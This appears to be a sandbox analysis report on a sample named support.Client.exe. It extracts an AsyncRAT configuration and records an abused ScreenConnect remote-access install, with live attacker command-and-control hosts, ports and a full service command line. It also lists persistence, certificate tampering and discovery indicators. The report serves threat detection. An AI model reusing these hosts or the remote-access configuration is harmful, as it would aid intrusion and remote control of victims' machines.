Analysis
-
max time kernel
135s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system -
submitted
06/08/2024, 09:20
Static task
static1
Behavioral task
behavioral1
Sample
support.Client.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
support.Client.exe
Resource
win10v2004-20240802-en
General
-
Target
support.Client.exe
-
Size
84KB
-
MD5
2b85c04408d16bd6e493eb59b87c54f2
-
SHA1
0c543e947d75e040795227e5e8106897a63f23a8
-
SHA256
fe4345e927352f9ef225d59bb664aafd838f028c569d074509351899a009e3f4
-
SHA512
a8474cbd214664abd7fa0ac8fc14fcf3bbd8561d7fbae2339ae92c63490d2247ca76b0c60fde37e16bc17a276e7168baaae172364ac12110534b92810166396d
-
SSDEEP
1536:bazWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYY27QkPx3S:pFNpo6rIKlUE8fbkqRfbaQlaYY2Lx3S
Malware Config
Extracted
asyncrat
AWS | 3Losh
zekzek
alertazazws123.ddnsgeek.com:7707
AsyncMutex_ggrt5syb5erw
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4168 created 3424 4168 Tx.pif 56 PID 4168 created 3424 4168 Tx.pif 56 -
Downloads MZ/PE file
-
Manipulates Digital Signatures 1 TTPs 4 IoCs
Attackers can modify Authenticode and cryptography-related registry keys (such as per-user certificate store entries) so that their binary is treated as validly signed. The IoCs below show support.Client.exe writing two certificate blobs into the current user's TrustedPublisher store and then deleting those keys.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 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 support.Client.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 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 support.Client.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C support.Client.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 support.Client.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f7966cef-4335-4600-89a4-f5a3714fafd8)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\PW3K10D3.CM8\\E4BXWJXO.OCE\\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\\ScreenConnect.ClientService.exe\" \"?y=Guest&h=edcthmedu.serveblog.net&p=8041&s=f7966cef-4335-4600-89a4-f5a3714fafd8&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA21CJimzipkyoRoHNSmyfUAAAAAACAAAAAAAQZgAAAAEAACAAAAAWJzUeP30nqIz59zniyt69ITGDTtJNfxL2wTHi4i1iWgAAAAAOgAAAAAIAACAAAABPz9OF3jBd6wOq6MFyxgMyQUCV20GFBmb%2fm6tEXgaQI6AEAAAO995M%2fRT2LdAkaNq7KT%2bSwZaxwF%2fYDHZPIFIgQ0SACb9r87a8yG6yZdLmF8ZRJxa0zznkxnY0D5LOXh8bFLgnEM6x6IFF%2bP1OT3%2b80MEUcOYcdsVYH6QEnQjsqQIqTlnaW9zd6NoKuXdEPlnVvUDunqDI5gqLry%2fy8CptbrK1reHixJ1udKvIIq3y3L5Hz9JMqXfnLqqCZTvGHwRbDcCzkWtLcKLHMx0UjkZeWFMmkyoA41sk0DrTuNb4BdW8Ktec%2f0rTpbe5RJVZMZlpYgV4M%2f7%2fyByfLSSJ0MzbZEXjHRbdk2GuIYhvg2OcDU4XXMyo6gSjvFN8bqWX%2bW9v5TpMfALiX0FIARxVMLmUgj2KxXs8JXbBTgPJPufEi6CMAxdinD6fAMlW8BR0Zg6E7ufHdHvCZllUsUha4ufOQYeyoT%2b9cEvAEC2j%2fLbpVFe4uYLhpwWNQmR4SWDNW4YI%2fecycR3lY7T5tQZK2Rv5OP22E%2fNccfVtJjRNGV4BzbMA1TQU6ssND%2fX%2fBMIVwGOw78ft7WI7mkSDZZxChZ26It00oUjmUd8PT0G9eKBXYiBgcjs9WvgW%2blDkx2c1leEtURPr3qPtxN%2fjhYvlLiJMFT3jTedcFh8UQ1GKi9o2UuA1nKfoiYWKRgjfChpyH7AnGbPqXxYmKmG5Q8KmfuzUhXXlvEHFF8rwNLB0F0eYCwAxe%2flsUR40G66szvCqkqUnHPP%2fppu13Ivdcvk41YbyTAn8EW8ZkkVWg%2bhF1fZ3BUUxL0mTxR1d6ZsTup%2bua%2bBloLLrPZrObwh4ZT4ybDRSYXDIs%2fY5FdWscM9hrkbMSAEyaT0SVbfvoGD4C70SVmzhfd2gGlLdUr4JzdelAS24T8rRC0Dgw37gDc%2bsqpznZZ9FNV5jTuKzi1haC2s1Cq3PdFyW%2bnKDlqw1GN9OaT%2b5N9w2
Y9YGfl7Ywpg0Egngq%2bW9IRIAu5FzOQoPdbKxTvzo6%2bBi4uRjuU0Z95E%2fdblWE0vqdYD%2bJOySlM0kVb4htjijNvC8ayUVXWnnv9hwBDrojqq6XfBi0tQ6FxwdRIXJtVU62P3lyVppSobrGMek5rcrtwduGwTGXSlbXrFKlzoOc3WWAzREDHmuzD%2bW1cT%2fCidZohN4TBbIpiO8YKLBXlELB%2fi%2f4GDO3plZS%2fchBUqFbNSgIaDsF9zOksL7%2f5aKGLhE5VojcBdfZdDGF5SqxBxabH9V%2faDuEvSqmmY2TlxOLRiHFKxFVckiOiLG%2fUzFfU5vT6BSY4L56ZLrOCwnP8qmor0gWZY%2bOaBU5tjQiLrzysURV%2bBIw5rnrngf%2bkISXVNibzOfJa9pK1UC%2bEQ1IzXu%2fPWDYsXA7IQd5WBDYU2NpncUPLc8y3rN8SEjgmYrbNtFhClNzh7%2fjXv5AebeueawC7WIMD54yLVzhahYzekrTcsNbL23Fa%2bCmFENuqAl4FljtrulRJJU20kNSGmZrOE90foKvyhGMONSqmismVPeX6u6hXCn5EdgFhvdOh2jvP4dCF076H%2fJ4ogGLi7FaC5Uqtvd3VuybyXy7MdIX40Ze9JYA3UiiETatqL6HsmnzS4eyEAAAACxdknAFr17WxzK66yLTAb0GzUY2MDaMxhZZh4rpiEE6NqkGdQawZiv56g8B%2bhQpmPpvuF1oOZEWHJQd8fDo%2bUO&r=&i=Untitled%20Session\" \"1\"" ScreenConnect.ClientService.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (73a0227d089fe193)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.ClientService.exe\" 
\"?e=Access&y=Guest&h=edcthmedu.serveblog.net&p=8041&s=0f8c9a42-9255-4cc9-a86d-495b4545c3f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA21CJimzipkyoRoHNSmyfUAAAAAACAAAAAAAQZgAAAAEAACAAAABsXU1X1uOPDsbiPprY28JeDb4xfoXbgJrS71APrUCVIQAAAAAOgAAAAAIAACAAAAAU4cZEd4AJ1dYd%2fWtG6D%2bqmYKnXuIBmY9Z1qjGLlXPbKAEAAD%2bbo8z9ECMo%2fnkVTHJTThU4YR45I%2bz4DrSEgP3o7YBLWD3bbLVYDEcibkoRYq5qEaIdumOnjaNqcdOsJC3p4bJBozyXQZQNpm0F%2fyGyGewUoFUWcTVT4pamEkqNpxYcQ2Y8drYtWXUo%2b%2f0ckxZ8oR%2bIFCeBNXOLux%2biuTQPibYu4B3%2beay3iMWsITeObF5Es2dzP3BUE7dOa0hzkNxW20n%2bvElIa4s5IoO1aqvim%2fcpHtBn0moeGkG62CR5dWXvVxyE%2fSWL4dQrORbnWBBTaXiiv57UdlCSowYdvS%2fGx5XDXb8mqv1WJqRmGJWk%2fZgwfj8IzE1KyAJ89zT9tWtLLGSftyaxA39pnVBbxGTMnugwFq8tKYbX0zS0WBuRwfwf20I9SzhT4Zt%2f6iiz48Uu1P2XK51%2b38OJ8KPEW%2fubHsVCBH0XXwX5rRmCgqm7%2fB7Gu1mr8KAjYot0sUlEVJt6wt39EmYPKRPeDUNzvOI9e4IuNSeu5pmfTTmuGEMdkt6afxIOHQxpW7l%2fFPbQqgmcWNY0gRmeGmSvZnw%2fWc62SFoyJqof5IK3iAaOpeQniZ2m3pU%2f3iRJL3b5gElwUJXu%2bJcGW%2fB5jwk26WSU6L9X3vqs4HiIIcPFD5UHHHlNn8iNQmGjqaRLHTipejXnAkuC%2b7M0zVWuxll%2fY%2fC3Nk4wGcXhf5trUAc26bzCd72wqNt9gaXbQHVwlSR%2bHkHKZliM6mjNFNO83H%2b05M5SrIpR3aI%2b9EMJU1PHSRpUYPW2pJgxrTE9ExeNEvZcC2RjigbnjWYd3c%2fZPkHGtRUXkcHAq%2fIPLvxQ%2fhONedbF8gG30jBwDGtbBo3P2dTaMN8KVPWtv2v3nRBSyMRuAm02OXeX0imIRkN0GpmYmQksKG6beTaXpHPaHiVU4iomDGLGSTLZHcfe3K2%2fhWVZUNo8ZJY5OGJwvDVqdGUOUDKl5kQH3CIqX4fluvL9Tm7yYd6uHKoj0xedLsSmXeSBeUCKyI0Ig0zhaVY6TltaQ31WGEPJ3NvNMnpD2IuiQVKYcXgpxXercET9ticB7ndY8dDXT5AnRavaX90k%2fN1Lg0W0i424%2fe0MmNdhErp2X1E7aMUGQRFQOqRCaxRWQslZIQILHrAUkrG4QW%2bF3wOeCqFwfaPyUNZf7%2bgD0emzqY9MHIatTsQpV%2fgrJUbf1yqEYIxcMCE1ryeG9EgI0GY%2bjH6piltDseEW%2fPQ1MIyJblM6
01X1OLAaWvvoYnTuB%2beR381%2bsuQ3HJjx%2bVv8KXQAdm8THMmDRA5YFyWs44%2b9KLQ1Uc0DoIXJD7rLn4%2f9F6O0hB%2fvPGLqXtl%2fudug35rwozk%2bGgKP2fVvo7wPwvJujWycQgWDYHzBlDDlEdb6Y%2bjeHTUGXmq7G5L7oRoA7mheKk4qll6YgK191i3GxgJPUM3HXVct30%2fkuALo3nALIJxXpN5Y33%2fJehaGHqkGQ4RV3liyR79%2fptuVcEdql%2b69%2ff6spajrqQli2BprH9hoQWbPixDtGf2X2h5ICOBvoZbhfx9aEPQ4F0dxdQhnKDMY0E8YJeTDW%2byVM9BFDOYcRrd4c0fRJX9SunyVkAAAACyaThZ4hvMvCufbKtHf09r%2ftNyCd%2bnD%2bjj%2faBeaIpEYJ5DNoHalqL0nteFoPBglwrmLk8Q0y533uUbGXFjKc38&t=mobic\"" ScreenConnect.ClientService.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up the country code configured in the registry (Control Panel\International\Geo\Nation), which is commonly used as a geofence check; here the query is made by ScreenConnect.WindowsClient.exe.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation ScreenConnect.WindowsClient.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url cmd.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 13 IoCs
pid Process 632 ScreenConnect.WindowsClient.exe 832 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 4952 ScreenConnect.WindowsClient.exe 2400 ScreenConnect.WindowsClient.exe 4612 ScreenConnect.WindowsClient.exe 400 Mozanm.exe 4168 Tx.pif 2296 ScreenConnect.ClientSetup.exe 2880 ScreenConnect.ClientService.exe 1780 ScreenConnect.WindowsClient.exe 1792 ScreenConnect.WindowsClient.exe 348 jsc.exe -
Loads dropped DLL 36 IoCs
pid Process 832 ScreenConnect.ClientService.exe 832 ScreenConnect.ClientService.exe 832 ScreenConnect.ClientService.exe 832 ScreenConnect.ClientService.exe 832 ScreenConnect.ClientService.exe 832 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3016 MsiExec.exe 3652 rundll32.exe 3652 rundll32.exe 3652 rundll32.exe 3652 rundll32.exe 3652 rundll32.exe 3652 rundll32.exe 3652 rundll32.exe 3016 MsiExec.exe 3016 MsiExec.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and session cookies.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023455-399.dat autoit_exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientSetup.exe.log ScreenConnect.ClientSetup.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log rundll32.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\qbld4os1.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\qbld4os1.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\user.config ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\user.config ScreenConnect.WindowsClient.exe -
Drops file in Program Files directory 16 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.resources msiexec.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF5E9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF5E9.tmp-\ScreenConnect.InstallerActions.dll rundll32.exe File created C:\Windows\Installer\wix{D148B9F4-189A-43AC-84BA-33C024DE3891}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Installer\{D148B9F4-189A-43AC-84BA-33C024DE3891}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIF81C.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57f4df.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF5E9.tmp-\ScreenConnect.Windows.dll rundll32.exe File opened for modification C:\Windows\Installer\MSIF5E9.tmp-\CustomAction.config rundll32.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{D148B9F4-189A-43AC-84BA-33C024DE3891} msiexec.exe File opened for modification C:\Windows\Installer\MSIF8BB.tmp msiexec.exe File created C:\Windows\Installer\{D148B9F4-189A-43AC-84BA-33C024DE3891}\DefaultIcon msiexec.exe File created C:\Windows\Installer\e57f4df.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF5E9.tmp-\Microsoft.Deployment.WindowsInstaller.dll rundll32.exe File opened for modification C:\Windows\Installer\MSIF5E9.tmp-\ScreenConnect.Core.dll rundll32.exe File opened for modification C:\Windows\Installer\MSIF83D.tmp msiexec.exe File created C:\Windows\Installer\e57f4e3.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host. Note that the NLS\Language key is also read by ordinary Windows components; several of the processes listed below (msiexec.exe, rundll32.exe, cmd.exe) are standard system binaries, so this indicator should be weighed together with the others rather than on its own.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Tx.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language support.Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Modifies data under HKEY_USERS 36 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Sequence = "1" msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Owner = dc0600009d866905e2e7da01 msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 404216a8ed98f8376b948891c7c2d5c46b7970bb63ef573d96b0ad45c1bdcc19 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientSetup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 msiexec.exe 
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientSetup.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientSetup.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" 
ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientSetup.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientSetup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1} dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\implication!scre..tion_25b0fbb6ef7eb094_0017.0002_485d = 